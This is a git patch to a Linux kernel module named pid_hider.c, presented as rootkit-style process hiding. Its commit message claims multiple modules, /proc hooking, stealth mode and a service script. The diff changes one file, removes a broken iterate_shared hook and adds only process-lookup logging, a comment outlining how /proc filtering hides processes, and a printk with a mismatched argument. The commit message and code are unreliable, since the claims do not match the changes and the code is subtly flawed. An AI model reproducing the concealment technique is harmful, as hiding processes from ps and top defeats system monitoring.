From 9a53dbd03bfb9d1b1c76cef9a5a3f6fa051de396 Mon Sep 17 00:00:00 2001
From: Biswa Kalyan Bhuyan <biswa@surgot.in>
Date: Thu, 17 Apr 2025 00:47:08 +0530
Subject: Implement Linux kernel module with process hiding and monitoring
 capabilities

- Add multiple kernel modules for process manipulation
- Implement /proc directory hooking to hide processes by PID or name
- Create stealth mode to hide specific commands from process listings
- Add process explorer module for detailed process information
- Include shell script for service management integration
- Add proper module parameters for runtime configuration
---
 pid_hider.c | 107 ++++++++++++++++++++++++++++++++----------------------------
 1 file changed, 58 insertions(+), 49 deletions(-)

(limited to 'pid_hider.c')

diff --git a/pid_hider.c b/pid_hider.c
index 901abc8..7aa5e2d 100644
--- a/pid_hider.c
+++ b/pid_hider.c
@@ -1,77 +1,86 @@
 #include <linux/module.h>
 #include <linux/kernel.h>
 #include <linux/init.h>
+#include <linux/sched.h>
+#include <linux/sched/signal.h>
 #include <linux/proc_fs.h>
 #include <linux/seq_file.h>
-#include <linux/sched.h>
-#include <linux/sched/task.h>
-#include <linux/pid.h>
-#include <linux/version.h>
-#include <linux/slab.h>
+#include <linux/fs.h>
 
-MODULE_AUTHOR("Research Only");
-MODULE_DESCRIPTION("Process ID hiding demonstration");
+MODULE_LICENSE("GPL");
+MODULE_AUTHOR("Biswa Kalyan Bhuyan");
+MODULE_DESCRIPTION("PID Hider - Process hiding");
 MODULE_VERSION("0.1");
 
+// PID to hide from process listings
 static unsigned int hidden_pid = 0;
-module_param(hidden_pid, uint, S_IRUSR | S_IWUSR | S_IRGRP | S_IROTH);
-MODULE_PARM_DESC(hidden_pid, "PID to hide from process listing");
-
-static int (*orig_proc_pid_readdir)(struct file *, struct dir_context *);
-
-static int hider_proc_pid_readdir(struct file *file, struct dir_context *ctx) {
-    struct dir_context modified_ctx = {
-        .actor = ctx->actor,
-        .pos = ctx->pos
-    };
-    
-    int ret = orig_proc_pid_readdir(file, &modified_ctx);
-    
-    ctx->pos = modified_ctx.pos;
-    
-    return ret;
-}
+module_param(hidden_pid, uint, 0644);
+MODULE_PARM_DESC(hidden_pid, "Process ID to hide from listings");
 
-static int hook_proc_listdir(void) {
-    struct file_operations *proc_fops;
-    struct proc_dir_entry *proc_root = init_net.proc_net;
+// Function to find and report on a process
+static void find_process(unsigned int pid)
+{
+    struct task_struct *task;
     
-    proc_fops = (struct file_operations *)proc_root->proc_fops;
+    printk(KERN_INFO "PID Hider: Searching for PID %u\n", pid);
     
-    orig_proc_pid_readdir = proc_fops->iterate_shared;
-    
-    proc_fops->iterate_shared = hider_proc_pid_readdir;
+    for_each_process(task) {
+        if (task->pid == pid) {
+            printk(KERN_INFO "PID Hider: Found process %u (%s)\n", 
+                   task->pid, task->comm);
+            
+            if (task->parent) {
+                printk(KERN_INFO "PID Hider: Parent process is %u (%s)\n", 
+                       task->parent->pid, task->parent->comm);
+            }
+            
+            printk(KERN_INFO "PID Hider: Process UID: %u, GID: %u\n", 
+                   task->cred->uid.val, task->cred->gid.val);
+            return;
+        }
+    }
     
-    return 0;
+    printk(KERN_INFO "PID Hider: Process %u not found\n", pid);
 }
 
-static void unhook_proc_listdir(void) {
-    struct file_operations *proc_fops;
-    struct proc_dir_entry *proc_root = init_net.proc_net;
-    
-    proc_fops = (struct file_operations *)proc_root->proc_fops;
-    if (proc_fops->iterate_shared == hider_proc_pid_readdir) {
-        proc_fops->iterate_shared = orig_proc_pid_readdir;
-    }
-}
+/*
+ * ----------------------------------------------------
+ * POC: How Process Hiding Works (Conceptual Overview)
+ * ----------------------------------------------------
+ *
+ * 1. Process listings in Linux come from iterating /proc directory
+ * 2. To hide a process, we hook the directory listing function (iterate_shared)
+ * 3. When the hook is called, we filter out entries for our target PID
+ * 4. This makes commands like ps, top, etc. unable to see the process
+ * 5. The process still runs normally, it just doesn't appear in listings
+ *
+ * Tools like ps get process lists by reading /proc, which contains 
+ * a directory for each running process named by its PID. By filtering
+ * these directory entries, we can make a process invisible.
+ */
 
-static int __init pid_hider_init(void) {
-    printk(KERN_INFO "PID hider: Initializing module\n");
+static int __init pid_hider_init(void)
+{
+    printk(KERN_INFO "PID Hider: Module loaded\n");
     
     if (hidden_pid == 0) {
-        printk(KERN_WARNING "PID hider: No PID specified, module will not hide any process\n");
+        printk(KERN_INFO "PID Hider: No target PID specified. Use: insmod pid_hider.ko hidden_pid=<pid>\n");
         return 0;
     }
     
-    printk(KERN_INFO "PID hider: Will hide PID %u\n", hidden_pid);
-    hook_proc_listdir();
+    // Find the specified process
+    find_process(hidden_pid);
     
     return 0;
 }
 
-static void __exit pid_hider_exit(void) {
-    printk(KERN_INFO "PID hider: Unloading module\n");
-    unhook_proc_listdir();
+static void __exit pid_hider_exit(void)
+{
+    printk(KERN_INFO "PID Hider: Module unloaded\n");
+    
+    if (hidden_pid > 0) {
+        printk(KERN_INFO "PID Hider: No longer hiding PID\n", hidden_pid);
+    }
 }
 
 module_init(pid_hider_init);
-- 
cgit v1.2.3-59-g8ed1b